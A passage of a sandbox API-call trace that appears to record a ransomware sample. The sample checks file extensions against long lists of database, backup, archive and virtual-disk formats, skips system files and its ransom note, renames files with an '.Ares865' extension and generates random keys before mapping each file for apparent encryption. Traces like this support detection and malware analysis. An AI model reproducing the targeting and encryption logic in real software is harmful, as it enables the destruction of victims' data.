(lpString1="nts.htm", lpString2="marshal") returned 1 [0063.496] lstrlenW (lpString="mas") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.496] lstrlenW (lpString="mav") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.496] lstrlenW (lpString="maw") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.496] lstrlenW (lpString="mdbhtml") returned 7 [0063.496] lstrcmpiW (lpString1="nts.htm", lpString2="mdbhtml") returned 1 [0063.496] lstrlenW (lpString="mdn") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.496] lstrlenW (lpString="mdt") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.496] lstrlenW (lpString="mfd") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.496] lstrlenW (lpString="mpd") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.496] lstrlenW (lpString="mrg") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.496] lstrlenW (lpString="mud") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.496] lstrlenW (lpString="mwb") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.496] lstrlenW (lpString="myd") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.496] lstrlenW (lpString="ndf") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.496] lstrlenW (lpString="nnt") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.496] lstrlenW (lpString="nrmlib") returned 6 [0063.496] lstrcmpiW (lpString1="ts.htm", lpString2="nrmlib") returned 1 [0063.496] lstrlenW (lpString="ns2") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.496] lstrlenW (lpString="ns3") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.496] lstrlenW (lpString="ns4") returned 3 [0063.496] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.497] lstrlenW (lpString="nsf") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.497] lstrlenW (lpString="nv") returned 2 [0063.497] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.497] lstrlenW (lpString="nv2") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.497] lstrlenW (lpString="nwdb") returned 4 [0063.497] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.497] lstrlenW (lpString="nyf") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.497] lstrlenW (lpString="odb") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.497] lstrlenW (lpString="odb") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.497] lstrlenW (lpString="oqy") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.497] lstrlenW (lpString="ora") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.497] lstrlenW (lpString="orx") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.497] lstrlenW (lpString="owc") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.497] lstrlenW (lpString="p96") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.497] lstrlenW (lpString="p97") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.497] lstrlenW (lpString="pan") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.497] lstrlenW (lpString="pdb") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.497] lstrlenW (lpString="pdm") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.497] lstrlenW (lpString="pnz") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.497] lstrlenW (lpString="qry") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.497] lstrlenW (lpString="qvd") returned 3 [0063.497] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.498] lstrlenW (lpString="rbf") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.498] lstrlenW (lpString="rctd") returned 4 [0063.498] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.498] lstrlenW (lpString="rod") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.498] lstrlenW (lpString="rodx") returned 4 [0063.498] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.498] lstrlenW (lpString="rpd") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.498] lstrlenW (lpString="rsd") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.498] lstrlenW (lpString="sas7bdat") returned 8 [0063.498] lstrcmpiW (lpString1="ints.htm", lpString2="sas7bdat") returned -1 [0063.498] lstrlenW (lpString="sbf") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.498] lstrlenW (lpString="scx") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.498] lstrlenW (lpString="sdb") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.498] lstrlenW (lpString="sdc") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.498] lstrlenW (lpString="sdf") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.498] lstrlenW (lpString="sis") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.498] lstrlenW (lpString="spq") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.498] lstrlenW (lpString="te") returned 2 [0063.498] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.498] lstrlenW (lpString="teacher") returned 7 [0063.498] lstrcmpiW (lpString1="nts.htm", lpString2="teacher") returned -1 [0063.498] lstrlenW (lpString="tmd") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.498] lstrlenW (lpString="tps") returned 3 [0063.498] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.499] lstrlenW (lpString="trc") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.499] lstrlenW (lpString="trc") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.499] lstrlenW (lpString="trm") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.499] lstrlenW (lpString="udb") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.499] lstrlenW (lpString="udl") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.499] lstrlenW (lpString="usr") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.499] lstrlenW (lpString="v12") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.499] lstrlenW (lpString="vis") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.499] lstrlenW (lpString="vpd") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.499] lstrlenW (lpString="vvv") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.499] lstrlenW (lpString="wdb") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.499] lstrlenW (lpString="wmdb") returned 4 [0063.499] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.499] lstrlenW (lpString="wrk") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.499] lstrlenW (lpString="xdb") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.499] lstrlenW (lpString="xld") returned 3 [0063.499] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.499] lstrlenW (lpString="xmlff") returned 5 [0063.499] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.499] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865") returned 94 [0063.499] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm.ares865"), dwFlags=0x1) returned 1 [0063.500] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\hand prints.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.500] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0063.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.501] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.502] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.504] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.508] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.509] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.509] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.509] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.510] CloseHandle (hObject=0x164) returned 1 [0063.510] CloseHandle (hObject=0x154) returned 1 [0063.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.510] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="HANDPR~1.JPG")) returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="aoldtz.exe") returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".") returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="..") returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="windows") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="bootmgr") returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="temp") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="pagefile.sys") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="boot") returned 1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="ids.txt") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="ntuser.dat") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="perflogs") returned -1 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="MSBuild") returned -1 [0063.510] lstrlenW (lpString="HandPrints.jpg") returned 14 [0063.510] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 86 [0063.510] lstrcpyW (in: lpString1=0x2cce48e, lpString2="HandPrints.jpg" | out: lpString1="HandPrints.jpg") returned="HandPrints.jpg" [0063.510] lstrlenW (lpString="HandPrints.jpg") returned 14 [0063.510] lstrlenW (lpString="Ares865") returned 7 [0063.510] lstrcmpiW (lpString1="nts.jpg", lpString2="Ares865") returned 1 [0063.510] lstrlenW (lpString=".dll") returned 4 [0063.510] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".dll") returned 1 [0063.511] lstrlenW (lpString=".lnk") returned 4 [0063.511] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".lnk") returned 1 [0063.511] lstrlenW (lpString=".ini") returned 4 [0063.511] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".ini") returned 1 [0063.511] lstrlenW (lpString=".sys") returned 4 [0063.511] lstrcmpiW (lpString1="HandPrints.jpg", lpString2=".sys") returned 1 [0063.511] lstrlenW (lpString="HandPrints.jpg") returned 14 [0063.511] lstrlenW (lpString="bak") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.511] lstrlenW (lpString="ba_") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.511] lstrlenW (lpString="dbb") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.511] lstrlenW (lpString="vmdk") returned 4 [0063.511] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.511] lstrlenW (lpString="rar") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.511] lstrlenW (lpString="zip") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.511] lstrlenW (lpString="tgz") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.511] lstrlenW (lpString="vbox") returned 4 [0063.511] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.511] lstrlenW (lpString="vdi") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.511] lstrlenW (lpString="vhd") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.511] lstrlenW (lpString="vhdx") returned 4 [0063.511] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.511] lstrlenW (lpString="avhd") returned 4 [0063.511] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.511] lstrlenW (lpString="db") returned 2 [0063.511] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.511] lstrlenW (lpString="db2") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.511] lstrlenW (lpString="db3") returned 3 [0063.511] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.512] lstrlenW (lpString="dbf") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.512] lstrlenW (lpString="mdf") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.512] lstrlenW (lpString="mdb") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.512] lstrlenW (lpString="sql") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.512] lstrlenW (lpString="sqlite") returned 6 [0063.512] lstrcmpiW (lpString1="ts.jpg", lpString2="sqlite") returned 1 [0063.512] lstrlenW (lpString="sqlite3") returned 7 [0063.512] lstrcmpiW (lpString1="nts.jpg", lpString2="sqlite3") returned -1 [0063.512] lstrlenW (lpString="sqlitedb") returned 8 [0063.512] lstrcmpiW (lpString1="ints.jpg", lpString2="sqlitedb") returned -1 [0063.512] lstrlenW (lpString="xml") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.512] lstrlenW (lpString="$er") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.512] lstrlenW (lpString="4dd") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.512] lstrlenW (lpString="4dl") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.512] lstrlenW (lpString="^^^") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.512] lstrlenW (lpString="abs") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.512] lstrlenW (lpString="abx") returned 3 [0063.512] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.512] lstrlenW (lpString="accdb") returned 5 [0063.512] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.512] lstrlenW (lpString="accdc") returned 5 [0063.512] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.512] lstrlenW (lpString="accde") returned 5 [0063.512] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.512] lstrlenW (lpString="accdr") returned 5 [0063.512] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.512] lstrlenW (lpString="accdt") returned 5 [0063.513] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.513] lstrlenW (lpString="accdw") returned 5 [0063.513] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.513] lstrlenW (lpString="accft") returned 5 [0063.513] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.513] lstrlenW (lpString="adb") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.513] lstrlenW (lpString="adb") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.513] lstrlenW (lpString="ade") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.513] lstrlenW (lpString="adf") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.513] lstrlenW (lpString="adn") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.513] lstrlenW (lpString="adp") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.513] lstrlenW (lpString="alf") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.513] lstrlenW (lpString="ask") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.513] lstrlenW (lpString="btr") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.513] lstrlenW (lpString="cat") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.513] lstrlenW (lpString="cdb") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.513] lstrlenW (lpString="ckp") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.513] lstrlenW (lpString="cma") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.513] lstrlenW (lpString="cpd") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.513] lstrlenW (lpString="dacpac") returned 6 [0063.513] lstrcmpiW (lpString1="ts.jpg", lpString2="dacpac") returned 1 [0063.513] lstrlenW (lpString="dad") returned 3 [0063.513] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.513] lstrlenW (lpString="dadiagrams") returned 10 [0063.514] lstrcmpiW (lpString1="Prints.jpg", lpString2="dadiagrams") returned 1 [0063.514] lstrlenW (lpString="daschema") returned 8 [0063.514] lstrcmpiW (lpString1="ints.jpg", lpString2="daschema") returned 1 [0063.514] lstrlenW (lpString="db-journal") returned 10 [0063.514] lstrcmpiW (lpString1="Prints.jpg", lpString2="db-journal") returned 1 [0063.514] lstrlenW (lpString="db-shm") returned 6 [0063.514] lstrcmpiW (lpString1="ts.jpg", lpString2="db-shm") returned 1 [0063.514] lstrlenW (lpString="db-wal") returned 6 [0063.514] lstrcmpiW (lpString1="ts.jpg", lpString2="db-wal") returned 1 [0063.514] lstrlenW (lpString="dbc") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.514] lstrlenW (lpString="dbs") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.514] lstrlenW (lpString="dbt") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.514] lstrlenW (lpString="dbv") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.514] lstrlenW (lpString="dbx") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.514] lstrlenW (lpString="dcb") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.514] lstrlenW (lpString="dct") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.514] lstrlenW (lpString="dcx") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.514] lstrlenW (lpString="ddl") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.514] lstrlenW (lpString="dlis") returned 4 [0063.514] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.514] lstrlenW (lpString="dp1") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.514] lstrlenW (lpString="dqy") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.514] lstrlenW (lpString="dsk") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.514] lstrlenW (lpString="dsn") returned 3 [0063.514] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.515] lstrlenW (lpString="dtsx") returned 4 [0063.515] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.515] lstrlenW (lpString="dxl") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.515] lstrlenW (lpString="eco") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.515] lstrlenW (lpString="ecx") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.515] lstrlenW (lpString="edb") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.515] lstrlenW (lpString="epim") returned 4 [0063.515] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.515] lstrlenW (lpString="fcd") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.515] lstrlenW (lpString="fdb") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.515] lstrlenW (lpString="fic") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.515] lstrlenW (lpString="flexolibrary") returned 12 [0063.515] lstrcmpiW (lpString1="ndPrints.jpg", lpString2="flexolibrary") returned 1 [0063.515] lstrlenW (lpString="fm5") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.515] lstrlenW (lpString="fmp") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.515] lstrlenW (lpString="fmp12") returned 5 [0063.515] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0063.515] lstrlenW (lpString="fmpsl") returned 5 [0063.515] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0063.515] lstrlenW (lpString="fol") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.515] lstrlenW (lpString="fp3") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.515] lstrlenW (lpString="fp4") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.515] lstrlenW (lpString="fp5") returned 3 [0063.515] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.515] lstrlenW (lpString="fp7") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.516] lstrlenW (lpString="fpt") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.516] lstrlenW (lpString="frm") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.516] lstrlenW (lpString="gdb") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.516] lstrlenW (lpString="gdb") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.516] lstrlenW (lpString="grdb") returned 4 [0063.516] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.516] lstrlenW (lpString="gwi") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.516] lstrlenW (lpString="hdb") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.516] lstrlenW (lpString="his") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.516] lstrlenW (lpString="ib") returned 2 [0063.516] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.516] lstrlenW (lpString="idb") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.516] lstrlenW (lpString="ihx") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.516] lstrlenW (lpString="itdb") returned 4 [0063.516] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.516] lstrlenW (lpString="itw") returned 3 [0063.516] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 